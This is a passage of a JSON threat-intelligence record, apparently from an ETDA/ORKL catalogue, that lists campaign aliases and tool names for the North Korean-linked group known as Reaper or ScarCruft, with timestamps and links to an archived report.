				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434720,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7da818fc54818da4536f98203ef35f39940ca222.pdf",
		"text": "https://archive.orkl.eu/7da818fc54818da4536f98203ef35f39940ca222.txt",
		"img": "https://archive.orkl.eu/7da818fc54818da4536f98203ef35f39940ca222.jpg"
	}
}